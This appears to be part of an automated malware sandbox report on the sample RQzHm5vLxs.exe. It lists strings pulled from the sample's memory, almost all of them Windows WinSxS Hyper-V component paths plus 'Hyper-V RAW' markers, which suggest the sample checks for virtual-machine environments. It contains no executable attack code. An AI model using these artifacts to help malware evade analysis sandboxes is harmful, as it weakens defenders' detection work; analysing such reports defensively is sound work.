Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4\{
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\W
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127\U
Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744\BB
Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\r\Q}+
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955\:
Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integratioU
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379\Z
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWz!
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\n\=
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.0000000002586000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\
Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\r\X!(
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\f\" R
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790\Z
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15\l
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5\
Source: RQzHm5vLxs.exe, 00000000.00000003.2063224091.00000000024E8000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.00000000024DC000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2112907141.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2120503693.00000000024E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\
Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provid
Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981\
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\}2t
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8\z
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\V
Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\
Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\6sJ
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.0000000002586000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2158945262.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2135558598.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2216977253.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\e
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2\
